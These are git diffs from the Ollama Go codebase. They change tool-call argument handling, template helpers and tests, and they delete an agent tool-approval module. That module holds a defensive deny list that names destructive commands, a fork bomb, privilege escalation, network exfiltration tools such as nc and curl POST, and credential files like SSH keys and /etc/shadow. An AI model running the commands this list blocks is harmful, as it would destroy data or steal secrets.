{input: []float32{float32(math.NaN()), 0.2, 0.3}, expectError: true},
{input: []float32{0.1, float32(math.NaN()), 0.3}, expectError: true},
{input: []float32{float32(math.Inf(1)), 0.2, 0.3}, expectError: true},
{input: []float32{float32(math.Inf(-1)), 0.2, 0.3}, expectError: true},
} }
isNormalized := func(vec []float32) (res bool) { isNormalized := func(vec []float32) (res bool) {
@ -753,18 +748,9 @@ func TestNormalize(t *testing.T) {
for _, tc := range testCases { for _, tc := range testCases {
t.Run("", func(t *testing.T) { t.Run("", func(t *testing.T) {
normalized, err := normalize(tc.input) normalized := normalize(tc.input)
if tc.expectError { if !isNormalized(normalized) {
if err == nil { t.Errorf("Vector %v is not normalized", tc.input)
t.Errorf("Expected error for input %v, but got none", tc.input)
}
} else {
if err != nil {
t.Errorf("Unexpected error for input %v: %v", tc.input, err)
}
if !isNormalized(normalized) {
t.Errorf("Vector %v is not normalized", tc.input)
}
} }
}) })
} }

View File

@ -272,8 +272,8 @@ func (t *Template) Execute(w io.Writer, v Values) error {
} else if !v.forceLegacy && slices.Contains(vars, "messages") { } else if !v.forceLegacy && slices.Contains(vars, "messages") {
return t.Template.Execute(w, map[string]any{ return t.Template.Execute(w, map[string]any{
"System": system, "System": system,
"Messages": convertMessagesForTemplate(messages), "Messages": messages,
"Tools": convertToolsForTemplate(v.Tools), "Tools": v.Tools,
"Response": "", "Response": "",
"Think": v.Think, "Think": v.Think,
"ThinkLevel": v.ThinkLevel, "ThinkLevel": v.ThinkLevel,
@ -373,118 +373,6 @@ func collate(msgs []api.Message) (string, []*api.Message) {
return strings.Join(system, "\n\n"), collated return strings.Join(system, "\n\n"), collated
} }
// templateTools is a slice of templateTool that marshals to JSON.
type templateTools []templateTool
func (t templateTools) String() string {
bts, _ := json.Marshal(t)
return string(bts)
}
// templateTool is a template-compatible representation of api.Tool
// with Properties as a regular map for template ranging.
type templateTool struct {
Type string `json:"type"`
Items any `json:"items,omitempty"`
Function templateToolFunction `json:"function"`
}
type templateToolFunction struct {
Name string `json:"name"`
Description string `json:"description"`
Parameters templateToolFunctionParameters `json:"parameters"`
}
type templateToolFunctionParameters struct {
Type string `json:"type"`
Defs any `json:"$defs,omitempty"`
Items any `json:"items,omitempty"`
Required []string `json:"required,omitempty"`
Properties map[string]api.ToolProperty `json:"properties"`
}
// templateToolCall is a template-compatible representation of api.ToolCall
// with Arguments as a regular map for template ranging.
type templateToolCall struct {
ID string
Function templateToolCallFunction
}
type templateToolCallFunction struct {
Index int
Name string
Arguments map[string]any
}
// templateMessage is a template-compatible representation of api.Message
// with ToolCalls converted for template use.
type templateMessage struct {
Role string
Content string
Thinking string
Images []api.ImageData
ToolCalls []templateToolCall
ToolName string
ToolCallID string
}
// convertToolsForTemplate converts Tools to template-compatible format.
func convertToolsForTemplate(tools api.Tools) templateTools {
if tools == nil {
return nil
}
result := make(templateTools, len(tools))
for i, tool := range tools {
result[i] = templateTool{
Type: tool.Type,
Items: tool.Items,
Function: templateToolFunction{
Name: tool.Function.Name,
Description: tool.Function.Description,
Parameters: templateToolFunctionParameters{
Type: tool.Function.Parameters.Type,
Defs: tool.Function.Parameters.Defs,
Items: tool.Function.Parameters.Items,
Required: tool.Function.Parameters.Required,
Properties: tool.Function.Parameters.Properties.ToMap(),
},
},
}
}
return result
}
// convertMessagesForTemplate converts Messages to template-compatible format.
func convertMessagesForTemplate(messages []*api.Message) []*templateMessage {
if messages == nil {
return nil
}
result := make([]*templateMessage, len(messages))
for i, msg := range messages {
var toolCalls []templateToolCall
for _, tc := range msg.ToolCalls {
toolCalls = append(toolCalls, templateToolCall{
ID: tc.ID,
Function: templateToolCallFunction{
Index: tc.Function.Index,
Name: tc.Function.Name,
Arguments: tc.Function.Arguments.ToMap(),
},
})
}
result[i] = &templateMessage{
Role: msg.Role,
Content: msg.Content,
Thinking: msg.Thinking,
Images: msg.Images,
ToolCalls: toolCalls,
ToolName: msg.ToolName,
ToolCallID: msg.ToolCallID,
}
}
return result
}
// Identifiers walks the node tree returning any identifiers it finds along the way // Identifiers walks the node tree returning any identifiers it finds along the way
func Identifiers(n parse.Node) ([]string, error) { func Identifiers(n parse.Node) ([]string, error) {
switch n := n.(type) { switch n := n.(type) {

View File

@ -124,21 +124,16 @@ func (p *Parser) parseToolCall() *api.ToolCall {
return nil return nil
} }
var argsMap map[string]any var args map[string]any
if found, i := findArguments(tool, p.buffer); found == nil { if found, i := findArguments(tool, p.buffer); found == nil {
return nil return nil
} else { } else {
argsMap = found args = found
if i > end { if i > end {
end = i end = i
} }
} }
args := api.NewToolCallFunctionArguments()
for k, v := range argsMap {
args.Set(k, v)
}
tc := &api.ToolCall{ tc := &api.ToolCall{
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: tool.Function.Name, Name: tool.Function.Name,

View File

@ -9,29 +9,6 @@ import (
"github.com/ollama/ollama/api" "github.com/ollama/ollama/api"
) )
// argsComparer provides cmp options for comparing ToolCallFunctionArguments by value (order-insensitive)
var argsComparer = cmp.Comparer(func(a, b api.ToolCallFunctionArguments) bool {
return cmp.Equal(a.ToMap(), b.ToMap())
})
// testPropsMap creates a ToolPropertiesMap from a map (convenience function for tests, order not preserved)
func testPropsMap(m map[string]api.ToolProperty) *api.ToolPropertiesMap {
props := api.NewToolPropertiesMap()
for k, v := range m {
props.Set(k, v)
}
return props
}
// testArgs creates ToolCallFunctionArguments from a map (convenience function for tests, order not preserved)
func testArgs(m map[string]any) api.ToolCallFunctionArguments {
args := api.NewToolCallFunctionArguments()
for k, v := range m {
args.Set(k, v)
}
return args
}
func TestParser(t *testing.T) { func TestParser(t *testing.T) {
qwen, err := template.New("qwen").Parse(`{{if .ToolCalls}}<tool_call>{{range .ToolCalls}}{"name": "{{.Function.Name}}", "arguments": {{.Function.Arguments}}}{{end}}</tool_call>{{end}}`) qwen, err := template.New("qwen").Parse(`{{if .ToolCalls}}<tool_call>{{range .ToolCalls}}{"name": "{{.Function.Name}}", "arguments": {{.Function.Arguments}}}{{end}}</tool_call>{{end}}`)
if err != nil { if err != nil {
@ -67,7 +44,7 @@ func TestParser(t *testing.T) {
Parameters: api.ToolFunctionParameters{ Parameters: api.ToolFunctionParameters{
Type: "object", Type: "object",
Required: []string{"city"}, Required: []string{"city"},
Properties: testPropsMap(map[string]api.ToolProperty{ Properties: map[string]api.ToolProperty{
"format": { "format": {
Type: api.PropertyType{"string"}, Type: api.PropertyType{"string"},
Description: "The format to return the temperature in", Description: "The format to return the temperature in",
@ -77,7 +54,7 @@ func TestParser(t *testing.T) {
Type: api.PropertyType{"string"}, Type: api.PropertyType{"string"},
Description: "The city to get the temperature for", Description: "The city to get the temperature for",
}, },
}), },
}, },
}, },
}, },
@ -88,12 +65,12 @@ func TestParser(t *testing.T) {
Description: "Retrieve the current weather conditions for a given location", Description: "Retrieve the current weather conditions for a given location",
Parameters: api.ToolFunctionParameters{ Parameters: api.ToolFunctionParameters{
Type: "object", Type: "object",
Properties: testPropsMap(map[string]api.ToolProperty{ Properties: map[string]api.ToolProperty{
"location": { "location": {
Type: api.PropertyType{"string"}, Type: api.PropertyType{"string"},
Description: "The location to get the weather conditions for", Description: "The location to get the weather conditions for",
}, },
}), },
}, },
}, },
}, },
@ -118,12 +95,12 @@ func TestParser(t *testing.T) {
Description: "Get the address of a given location", Description: "Get the address of a given location",
Parameters: api.ToolFunctionParameters{ Parameters: api.ToolFunctionParameters{
Type: "object", Type: "object",
Properties: testPropsMap(map[string]api.ToolProperty{ Properties: map[string]api.ToolProperty{
"location": { "location": {
Type: api.PropertyType{"string"}, Type: api.PropertyType{"string"},
Description: "The location to get the address for", Description: "The location to get the address for",
}, },
}), },
}, },
}, },
}, },
@ -134,7 +111,7 @@ func TestParser(t *testing.T) {
Description: "Add two numbers", Description: "Add two numbers",
Parameters: api.ToolFunctionParameters{ Parameters: api.ToolFunctionParameters{
Type: "object", Type: "object",
Properties: testPropsMap(map[string]api.ToolProperty{ Properties: map[string]api.ToolProperty{
"a": { "a": {
Type: api.PropertyType{"string"}, Type: api.PropertyType{"string"},
Description: "The first number to add", Description: "The first number to add",
@ -143,7 +120,7 @@ func TestParser(t *testing.T) {
Type: api.PropertyType{"string"}, Type: api.PropertyType{"string"},
Description: "The second number to add", Description: "The second number to add",
}, },
}), },
}, },
}, },
}, },
@ -180,9 +157,9 @@ func TestParser(t *testing.T) {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Index: 0, Index: 0,
Name: "get_conditions", Name: "get_conditions",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"location": "San Francisco", "location": "San Francisco",
}), },
}, },
}, },
}, },
@ -197,7 +174,7 @@ func TestParser(t *testing.T) {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Index: 0, Index: 0,
Name: "get_conditions", Name: "get_conditions",
Arguments: api.NewToolCallFunctionArguments(), Arguments: api.ToolCallFunctionArguments{},
}, },
}, },
}, },
@ -212,9 +189,9 @@ func TestParser(t *testing.T) {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Index: 0, Index: 0,
Name: "get_temperature", Name: "get_temperature",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"city": "New York", "city": "New York",
}), },
}, },
}, },
}, },
@ -236,19 +213,19 @@ func TestParser(t *testing.T) {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Index: 0, Index: 0,
Name: "get_temperature", Name: "get_temperature",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"city": "London", "city": "London",
"format": "fahrenheit", "format": "fahrenheit",
}), },
}, },
}, },
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Index: 1, Index: 1,
Name: "get_conditions", Name: "get_conditions",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"location": "Tokyo", "location": "Tokyo",
}), },
}, },
}, },
}, },
@ -263,19 +240,19 @@ func TestParser(t *testing.T) {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Index: 0, Index: 0,
Name: "get_temperature", Name: "get_temperature",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"city": "London", "city": "London",
"format": "fahrenheit", "format": "fahrenheit",
}), },
}, },
}, },
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Index: 1, Index: 1,
Name: "get_conditions", Name: "get_conditions",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"location": "Tokyo", "location": "Tokyo",
}), },
}, },
}, },
}, },
@ -290,17 +267,17 @@ func TestParser(t *testing.T) {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Index: 0, Index: 0,
Name: "say_hello", Name: "say_hello",
Arguments: api.NewToolCallFunctionArguments(), Arguments: api.ToolCallFunctionArguments{},
}, },
}, },
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Index: 1, Index: 1,
Name: "get_temperature", Name: "get_temperature",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"city": "London", "city": "London",
"format": "fahrenheit", "format": "fahrenheit",
}), },
}, },
}, },
}, },
@ -315,16 +292,16 @@ func TestParser(t *testing.T) {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Index: 0, Index: 0,
Name: "get_conditions", Name: "get_conditions",
Arguments: api.NewToolCallFunctionArguments(), Arguments: api.ToolCallFunctionArguments{},
}, },
}, },
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Index: 1, Index: 1,
Name: "get_conditions", Name: "get_conditions",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"location": "Tokyo", "location": "Tokyo",
}), },
}, },
}, },
}, },
@ -339,9 +316,9 @@ func TestParser(t *testing.T) {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Index: 0, Index: 0,
Name: "get_temperature", Name: "get_temperature",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"city": "Tokyo", "city": "Tokyo",
}), },
}, },
}, },
}, },
@ -370,9 +347,9 @@ func TestParser(t *testing.T) {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Index: 0, Index: 0,
Name: "get_temperature", Name: "get_temperature",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"city": "Tokyo", "city": "Tokyo",
}), },
}, },
}, },
}, },
@ -394,9 +371,9 @@ func TestParser(t *testing.T) {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Index: 0, Index: 0,
Name: "get_temperature", Name: "get_temperature",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"city": "Tokyo", "city": "Tokyo",
}), },
}, },
}, },
}, },
@ -476,18 +453,18 @@ func TestParser(t *testing.T) {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Index: 0, Index: 0,
Name: "get_temperature", Name: "get_temperature",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"city": "London", "city": "London",
}), },
}, },
}, },
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Index: 1, Index: 1,
Name: "get_conditions", Name: "get_conditions",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"location": "Tokyo", "location": "Tokyo",
}), },
}, },
}, },
}, },
@ -509,9 +486,9 @@ func TestParser(t *testing.T) {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Index: 0, Index: 0,
Name: "get_conditions", Name: "get_conditions",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"location": "Tokyo", "location": "Tokyo",
}), },
}, },
}, },
}, },
@ -551,9 +528,9 @@ func TestParser(t *testing.T) {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Index: 0, Index: 0,
Name: "get_conditions", Name: "get_conditions",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"location": "Tokyo", "location": "Tokyo",
}), },
}, },
}, },
}, },
@ -586,7 +563,7 @@ func TestParser(t *testing.T) {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Index: 0, Index: 0,
Name: "say_hello_world", Name: "say_hello_world",
Arguments: api.NewToolCallFunctionArguments(), Arguments: api.ToolCallFunctionArguments{},
}, },
}, },
}, },
@ -614,14 +591,14 @@ func TestParser(t *testing.T) {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Index: 0, Index: 0,
Name: "say_hello_world", Name: "say_hello_world",
Arguments: api.NewToolCallFunctionArguments(), Arguments: api.ToolCallFunctionArguments{},
}, },
}, },
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Index: 1, Index: 1,
Name: "say_hello", Name: "say_hello",
Arguments: api.NewToolCallFunctionArguments(), Arguments: api.ToolCallFunctionArguments{},
}, },
}, },
}, },
@ -647,14 +624,14 @@ func TestParser(t *testing.T) {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Index: 0, Index: 0,
Name: "say_hello", Name: "say_hello",
Arguments: api.NewToolCallFunctionArguments(), Arguments: api.ToolCallFunctionArguments{},
}, },
}, },
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Index: 1, Index: 1,
Name: "say_hello_world", Name: "say_hello_world",
Arguments: api.NewToolCallFunctionArguments(), Arguments: api.ToolCallFunctionArguments{},
}, },
}, },
}, },
@ -671,7 +648,7 @@ func TestParser(t *testing.T) {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Index: 0, Index: 0,
Name: "say_hello", Name: "say_hello",
Arguments: api.NewToolCallFunctionArguments(), Arguments: api.ToolCallFunctionArguments{},
}, },
}, },
}, },
@ -688,7 +665,7 @@ func TestParser(t *testing.T) {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Index: 0, Index: 0,
Name: "say_hello_world", Name: "say_hello_world",
Arguments: api.NewToolCallFunctionArguments(), Arguments: api.ToolCallFunctionArguments{},
}, },
}, },
}, },
@ -710,9 +687,9 @@ func TestParser(t *testing.T) {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Index: 0, Index: 0,
Name: "get_address", Name: "get_address",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"location": "London", "location": "London",
}), },
}, },
}, },
}, },
@ -729,9 +706,9 @@ func TestParser(t *testing.T) {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Index: 0, Index: 0,
Name: "get_address", Name: "get_address",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"location": "London", "location": "London",
}), },
}, },
}, },
}, },
@ -748,10 +725,10 @@ func TestParser(t *testing.T) {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Index: 0, Index: 0,
Name: "add", Name: "add",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"a": "5", "a": "5",
"b": "10", "b": "10",
}), },
}, },
}, },
}, },
@ -779,7 +756,7 @@ func TestParser(t *testing.T) {
} }
for i, want := range tt.calls { for i, want := range tt.calls {
if diff := cmp.Diff(calls[i], want, argsComparer); diff != "" { if diff := cmp.Diff(calls[i], want); diff != "" {
t.Errorf("Tool call %d mismatch (-got +want):\n%s", i, diff) t.Errorf("Tool call %d mismatch (-got +want):\n%s", i, diff)
} }
} }
@ -1339,7 +1316,7 @@ func TestFindArguments(t *testing.T) {
got, _ := findArguments(&api.Tool{Function: api.ToolFunction{Name: tt.tool}}, tt.buffer) got, _ := findArguments(&api.Tool{Function: api.ToolFunction{Name: tt.tool}}, tt.buffer)
if diff := cmp.Diff(got, tt.want); diff != "" { if diff := cmp.Diff(got, tt.want); diff != "" {
t.Errorf("findArguments() args mismatch (-got +want):\n%s", diff) t.Errorf("scanArguments() args mismatch (-got +want):\n%s", diff)
} }
}) })
} }

View File

@ -9,7 +9,6 @@ type ConfigV2 struct {
FileType string `json:"file_type"` // shown as Quantization Level FileType string `json:"file_type"` // shown as Quantization Level
Renderer string `json:"renderer,omitempty"` Renderer string `json:"renderer,omitempty"`
Parser string `json:"parser,omitempty"` Parser string `json:"parser,omitempty"`
Requires string `json:"requires,omitempty"`
RemoteHost string `json:"remote_host,omitempty"` RemoteHost string `json:"remote_host,omitempty"`
RemoteModel string `json:"remote_model,omitempty"` RemoteModel string `json:"remote_model,omitempty"`

View File

@ -1,953 +0,0 @@
// Package agent provides agent loop orchestration and tool approval.
package agent
import (
"fmt"
"os"
"path/filepath"
"strings"
"sync"
"golang.org/x/term"
)
// ApprovalDecision represents the user's decision for a tool execution.
type ApprovalDecision int
const (
// ApprovalDeny means the user denied execution.
ApprovalDeny ApprovalDecision = iota
// ApprovalOnce means execute this one time only.
ApprovalOnce
// ApprovalAlways means add to session allowlist.
ApprovalAlways
)
// ApprovalResult contains the decision and optional deny reason.
type ApprovalResult struct {
Decision ApprovalDecision
DenyReason string
}
// Option labels for the selector (numbered for quick selection)
var optionLabels = []string{
"1. Execute once",
"2. Always allow",
"3. Deny",
}
// autoAllowCommands are commands that are always allowed without prompting.
// These are zero-risk, read-only commands.
var autoAllowCommands = map[string]bool{
"pwd": true,
"echo": true,
"date": true,
"whoami": true,
"hostname": true,
"uname": true,
}
// autoAllowPrefixes are command prefixes that are always allowed.
// These are read-only or commonly-needed development commands.
var autoAllowPrefixes = []string{
// Git read-only
"git status", "git log", "git diff", "git branch", "git show",
"git remote -v", "git tag", "git stash list",
// Package managers - run scripts
"npm run", "npm test", "npm start",
"bun run", "bun test",
"uv run",
"yarn run", "yarn test",
"pnpm run", "pnpm test",
// Package info
"go list", "go version", "go env",
"npm list", "npm ls", "npm version",
"pip list", "pip show",
"cargo tree", "cargo version",
// Build commands
"go build", "go test", "go fmt", "go vet",
"make", "cmake",
"cargo build", "cargo test", "cargo check",
}
// denyPatterns are dangerous command patterns that are always blocked.
var denyPatterns = []string{
// Destructive commands
"rm -rf", "rm -fr",
"mkfs", "dd if=", "dd of=",
"shred",
"> /dev/", ">/dev/",
// Privilege escalation
"sudo ", "su ", "doas ",
"chmod 777", "chmod -R 777",
"chown ", "chgrp ",
// Network exfiltration
"curl -d", "curl --data", "curl -X POST", "curl -X PUT",
"wget --post",
"nc ", "netcat ",
"scp ", "rsync ",
// History and credentials
"history",
".bash_history", ".zsh_history",
".ssh/id_rsa", ".ssh/id_dsa", ".ssh/id_ecdsa", ".ssh/id_ed25519",
".ssh/config",
".aws/credentials", ".aws/config",
".gnupg/",
"/etc/shadow", "/etc/passwd",
// Dangerous patterns
":(){ :|:& };:", // fork bomb
"chmod +s", // setuid
"mkfifo",
}
// denyPathPatterns are file patterns that should never be accessed.
// These are checked as exact filename matches or path suffixes.
var denyPathPatterns = []string{
".env",
".env.local",
".env.production",
"credentials.json",
"secrets.json",
"secrets.yaml",
"secrets.yml",
".pem",
".key",
}
// ApprovalManager manages tool execution approvals.
type ApprovalManager struct {
allowlist map[string]bool // exact matches
prefixes map[string]bool // prefix matches for bash commands (e.g., "cat:tools/")
mu sync.RWMutex
}
// NewApprovalManager creates a new approval manager.
func NewApprovalManager() *ApprovalManager {
return &ApprovalManager{
allowlist: make(map[string]bool),
prefixes: make(map[string]bool),
}
}
// IsAutoAllowed checks if a bash command is auto-allowed (no prompt needed).
func IsAutoAllowed(command string) bool {
command = strings.TrimSpace(command)
// Check exact command match (first word)
fields := strings.Fields(command)
if len(fields) > 0 && autoAllowCommands[fields[0]] {
return true
}
// Check prefix match
for _, prefix := range autoAllowPrefixes {
if strings.HasPrefix(command, prefix) {
return true
}
}
return false
}
// IsDenied checks if a bash command matches deny patterns.
// Returns true and the matched pattern if denied.
func IsDenied(command string) (bool, string) {
commandLower := strings.ToLower(command)
// Check deny patterns
for _, pattern := range denyPatterns {
if strings.Contains(commandLower, strings.ToLower(pattern)) {
return true, pattern
}
}
// Check deny path patterns
for _, pattern := range denyPathPatterns {
if strings.Contains(commandLower, strings.ToLower(pattern)) {
return true, pattern
}
}
return false, ""
}
// FormatDeniedResult returns the tool result message when a command is blocked.
func FormatDeniedResult(command string, pattern string) string {
return fmt.Sprintf("Command blocked: this command matches a dangerous pattern (%s) and cannot be executed. If this command is necessary, please ask the user to run it manually.", pattern)
}
// extractBashPrefix extracts a prefix pattern from a bash command.
// For commands like "cat tools/tools_test.go | head -200", returns "cat:tools/"
// For commands without path args, returns empty string.
func extractBashPrefix(command string) string {
// Split command by pipes and get the first part
parts := strings.Split(command, "|")
firstCmd := strings.TrimSpace(parts[0])
// Split into command and args
fields := strings.Fields(firstCmd)
if len(fields) < 2 {
return ""
}
baseCmd := fields[0]
// Common commands that benefit from prefix allowlisting
// These are typically safe for read operations on specific directories
safeCommands := map[string]bool{
"cat": true, "ls": true, "head": true, "tail": true,
"less": true, "more": true, "file": true, "wc": true,
"grep": true, "find": true, "tree": true, "stat": true,
"sed": true,
}
if !safeCommands[baseCmd] {
return ""
}
// Find the first path-like argument (must contain / or start with .)
// First pass: look for clear paths (containing / or starting with .)
for _, arg := range fields[1:] {
// Skip flags
if strings.HasPrefix(arg, "-") {
continue
}
// Skip numeric arguments (e.g., "head -n 100")
if isNumeric(arg) {
continue
}
// Only process if it looks like a path (contains / or starts with .)
if !strings.Contains(arg, "/") && !strings.HasPrefix(arg, ".") {
continue
}
// If arg ends with /, it's a directory - use it directly
if strings.HasSuffix(arg, "/") {
return fmt.Sprintf("%s:%s", baseCmd, arg)
}
// Get the directory part of a file path
dir := filepath.Dir(arg)
if dir == "." {
// Path is just a directory like "tools" or "src" (no trailing /)
return fmt.Sprintf("%s:%s/", baseCmd, arg)
}
return fmt.Sprintf("%s:%s/", baseCmd, dir)
}
// Second pass: if no clear path found, use the first non-flag argument as a filename
for _, arg := range fields[1:] {
if strings.HasPrefix(arg, "-") {
continue
}
if isNumeric(arg) {
continue
}
// Treat as filename in current dir
return fmt.Sprintf("%s:./", baseCmd)
}
return ""
}
// isNumeric checks if a string is a numeric value
func isNumeric(s string) bool {
for _, c := range s {
if c < '0' || c > '9' {
return false
}
}
return len(s) > 0
}
// isCommandOutsideCwd checks if a bash command targets paths outside the current working directory.
// Returns true if any path argument would access files outside cwd.
func isCommandOutsideCwd(command string) bool {
cwd, err := os.Getwd()
if err != nil {
return false // Can't determine, assume safe
}
// Split command by pipes and semicolons to check all parts
parts := strings.FieldsFunc(command, func(r rune) bool {
return r == '|' || r == ';' || r == '&'
})
for _, part := range parts {
part = strings.TrimSpace(part)
fields := strings.Fields(part)
if len(fields) == 0 {
continue
}
// Check each argument that looks like a path
for _, arg := range fields[1:] {
// Skip flags
if strings.HasPrefix(arg, "-") {
continue
}
// Treat POSIX-style absolute paths as outside cwd on all platforms.
if strings.HasPrefix(arg, "/") || strings.HasPrefix(arg, "\\") {
return true
}
// Check for absolute paths outside cwd
if filepath.IsAbs(arg) {
absPath := filepath.Clean(arg)
if !strings.HasPrefix(absPath, cwd) {
return true
}
continue
}
// Check for relative paths that escape cwd (e.g., ../foo, /etc/passwd)
if strings.HasPrefix(arg, "..") {
// Resolve the path relative to cwd
absPath := filepath.Join(cwd, arg)
absPath = filepath.Clean(absPath)
if !strings.HasPrefix(absPath, cwd) {
return true
}
}
// Check for home directory expansion
if strings.HasPrefix(arg, "~") {
home, err := os.UserHomeDir()
if err == nil && !strings.HasPrefix(home, cwd) {
return true
}
}
}
}
return false
}
// AllowlistKey generates the key for exact allowlist lookup.
func AllowlistKey(toolName string, args map[string]any) string {
if toolName == "bash" {
if cmd, ok := args["command"].(string); ok {
return fmt.Sprintf("bash:%s", cmd)
}
}
return toolName
}
// IsAllowed checks if a tool/command is allowed (exact match or prefix match).
func (a *ApprovalManager) IsAllowed(toolName string, args map[string]any) bool {
a.mu.RLock()
defer a.mu.RUnlock()
// Check exact match first
key := AllowlistKey(toolName, args)
if a.allowlist[key] {
return true
}
// For bash commands, check prefix matches
if toolName == "bash" {
if cmd, ok := args["command"].(string); ok {
prefix := extractBashPrefix(cmd)
if prefix != "" && a.prefixes[prefix] {
return true
}
}
}
// Check if tool itself is allowed (non-bash)
if toolName != "bash" && a.allowlist[toolName] {
return true
}
return false
}
// AddToAllowlist adds a tool/command to the session allowlist.
// For bash commands, it adds the prefix pattern instead of exact command.
func (a *ApprovalManager) AddToAllowlist(toolName string, args map[string]any) {
a.mu.Lock()
defer a.mu.Unlock()
if toolName == "bash" {
if cmd, ok := args["command"].(string); ok {
prefix := extractBashPrefix(cmd)
if prefix != "" {
a.prefixes[prefix] = true
return
}
// Fall back to exact match if no prefix extracted
a.allowlist[fmt.Sprintf("bash:%s", cmd)] = true
return
}
}
a.allowlist[toolName] = true
}
// RequestApproval prompts the user for approval to execute a tool.
// Returns the decision and optional deny reason.
func (a *ApprovalManager) RequestApproval(toolName string, args map[string]any) (ApprovalResult, error) {
// Format tool info for display
toolDisplay := formatToolDisplay(toolName, args)
// Enter raw mode for interactive selection
fd := int(os.Stdin.Fd())
oldState, err := term.MakeRaw(fd)
if err != nil {
// Fallback to simple input if terminal control fails
return a.fallbackApproval(toolDisplay)
}
// Flush any pending stdin input before starting selector
// This prevents buffered input from causing double-press issues
flushStdin(fd)
// Check if bash command targets paths outside cwd
isWarning := false
if toolName == "bash" {
if cmd, ok := args["command"].(string); ok {
isWarning = isCommandOutsideCwd(cmd)
}
}
// Run interactive selector
selected, denyReason, err := runSelector(fd, oldState, toolDisplay, isWarning)
if err != nil {
term.Restore(fd, oldState)
return ApprovalResult{Decision: ApprovalDeny}, err
}
// Restore terminal
term.Restore(fd, oldState)
// Map selection to decision
switch selected {
case -1: // Ctrl+C cancelled
return ApprovalResult{Decision: ApprovalDeny, DenyReason: "cancelled"}, nil
case 0:
return ApprovalResult{Decision: ApprovalOnce}, nil
case 1:
return ApprovalResult{Decision: ApprovalAlways}, nil
default:
return ApprovalResult{Decision: ApprovalDeny, DenyReason: denyReason}, nil
}
}
// formatToolDisplay creates the display string for a tool call.
func formatToolDisplay(toolName string, args map[string]any) string {
var sb strings.Builder
// For bash, show command directly
if toolName == "bash" {
if cmd, ok := args["command"].(string); ok {
sb.WriteString(fmt.Sprintf("Tool: %s\n", toolName))
sb.WriteString(fmt.Sprintf("Command: %s", cmd))
return sb.String()
}
}
// For web search, show query
if toolName == "web_search" {
if query, ok := args["query"].(string); ok {
sb.WriteString(fmt.Sprintf("Tool: %s\n", toolName))
sb.WriteString(fmt.Sprintf("Query: %s", query))
return sb.String()
}
}
// Generic display
sb.WriteString(fmt.Sprintf("Tool: %s", toolName))
if len(args) > 0 {
sb.WriteString("\nArguments: ")
first := true
for k, v := range args {
if !first {
sb.WriteString(", ")
}
sb.WriteString(fmt.Sprintf("%s=%v", k, v))
first = false
}
}
return sb.String()
}
// selectorState holds the state for the interactive selector
type selectorState struct {
toolDisplay string
selected int
totalLines int
termWidth int
termHeight int
boxWidth int
innerWidth int
denyReason string // deny reason (always visible in box)
isWarning bool // true if command targets paths outside cwd (red box)
}
// runSelector runs the interactive selector and returns the selected index and optional deny reason.
// If isWarning is true, the box is rendered in red to indicate the command targets paths outside cwd.
func runSelector(fd int, oldState *term.State, toolDisplay string, isWarning bool) (int, string, error) {
state := &selectorState{
toolDisplay: toolDisplay,
selected: 0,
isWarning: isWarning,
}
// Get terminal size
state.termWidth, state.termHeight, _ = term.GetSize(fd)
if state.termWidth < 20 {
state.termWidth = 80 // fallback
}
// Calculate box width: 90% of terminal, min 24, max 60
state.boxWidth = (state.termWidth * 90) / 100
if state.boxWidth > 60 {
state.boxWidth = 60
}
if state.boxWidth < 24 {
state.boxWidth = 24
}
// Ensure box fits in terminal
if state.boxWidth > state.termWidth-1 {
state.boxWidth = state.termWidth - 1
}
state.innerWidth = state.boxWidth - 4 // account for "│ " and " │"
// Calculate total lines (will be updated by render)
state.totalLines = calculateTotalLines(state)
